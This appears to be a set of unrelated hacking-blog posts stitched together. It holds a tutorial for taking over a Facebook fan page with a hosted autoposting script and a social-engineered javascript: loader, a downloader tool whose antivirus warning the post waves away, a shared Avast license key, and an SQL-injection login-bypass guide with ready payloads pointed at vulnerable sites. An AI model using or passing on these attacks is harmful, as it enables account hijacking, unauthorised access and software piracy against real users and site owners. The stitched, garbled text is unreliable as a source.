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Today I will show you how to hack a Facebook(Hack Facebook) Fan(Be A Fan Of Me) page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.

Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
1. Free Download the exploit from this Link.
2. After Free Downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can Free Download it from here.
3. Open the file named pagehack.js with notepad++. Now find the text by pressing ctrl+f and replace it with your own email id which you have used while signing up for Facebook(Hack Facebook).
4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the textHey See what i got! and replace it with your own text. This text will be sent to the Facebook(Hack Facebook) wall of 15 friends of the victim. Since it is an autoposting bot, to prevent Facebook(Hack Facebook) from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)
5. Now you have to upload this script to your server. For this make an account at (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan(Be A Fan Of Me) page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in hisbrowser’s address bar and hit enter while he is on Facebook(Hack Facebook).
javascript:(a = (b = document).createElement(“script”)).src = “//“, b.body.appendChild(a); void(0)
Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

Sharecash Downloader 2011

How To Use This Software..

2. extract to desktop ( note:- your antivirus may dedect it as virus but its not)

3. now open it

4. have your sharecash file download link 

5. if you donot have link then get it here 
    ( )

6. Just copy and paste this link to the download bar and click on nagivate

7. wait for 1 min. and then click on download

8. you downloading will start in 5 sec.

Enjoy and donot forget to comment 

Finally, Avast! Free Antivirus 6.0 final version available for public download. Now Avast is one of the most popular antivirus software in the world with More than 140 million registrations. There are many improvement and new features in the new version Avast! Free Antivirus 6.0 such as auto sandbox, site blocking, webrep and more.

Compared with the old version of Avast antivirus, the Avast free antivirus 6.0 has a faster loading speed and lighter. Avast free antivirus 6 now fully support for windows 64 bit version. The Avast 6 support for Windows XP (Service Pack 2 or higher), Windows Vista (any Edition exclude Starter Edition) and Windows 7. 

New Features Of Avast! Free Antivirus 6.0
  • AutoSandbox, suspicious programs will be optionally run sandboxed and – Improvements in the Avast! sandbox
  • WebRep, browser plugin for website reputation rating. This is combination of automatically gathered Web threat intelligence and manual user input.
  • Site blocking, To block any website that listed in blocked list
This license is active for a very long time, because it will activate the software for more than 20 years. And apparently, the license key can also be used to Avast 4.8, Avast 5 and Avast 6.

Note: When I tested this key, Avast does not block these licenses. The Avast license key can be used on Avast free antivirus only and you can use the Avast free for non commercial uses only. Use the license as your own risk because there is no guarantee Avast would not block the license in the future.

Here the Avast License Key: W6754380R9978A0910-4TZ59467

Download Avast! Free Antivirus 6.0 Trial Version aka Offline Installer From Here

You can get more info and download Avast! Free Antivirus 6.0 from this link or you can download the offline installer Avast 6 here: setup_av_free.exe (Direct download link).

Enjoy and donot forget to comment ......

Bypass Website Login By SQL Injection Hack !

Suppose, a site has a login form and only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login scriptblock is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn’t that the beauty of " SQL injection " ??

It Is Recommended to read previous post on " SQL Injection "Before Reading this.

Let’s see an example, where the username admin with the password pass123 can login to the site.
Suppose, the SQL query for this is carried out as below:

SELECT USER from database WHERE username=’admin’ AND password=’pass123′

And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the scriptblock is not sanitized. This opens a door for the hackers to gain illegal access to the site.
In this example, the attacker can enter the following user data in the login form:

username: a or 1=1–


So, this would make our query as:

SELECT USER from database WHERE username=’a’ or 1=1– AND password=”

Note :- In Previous post on " SQL Injection " Theirs given a link have 6 K vurnabelar sites

Note that — is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*.

So our above query becomes:

SELECT USER from database WHERE username=’a’ or 1=1
Now this query evaluates true even if there is no user called ‘a’ bcoz 1=1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel.

There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login.

Few such combinations are:

username:’ or 1=’1 password:’ or 1=’1

username:’ or ’1′=’1′ password:’ or ’1′=’1′

username:or 1=1 password:or 1=1

and there are many more cheat sheets. Just google. In fact, you can create your own such combination to bypass logins..

That’s all about bypassing logins.

Enjoy this Website Hack And Do not Forget To Comment

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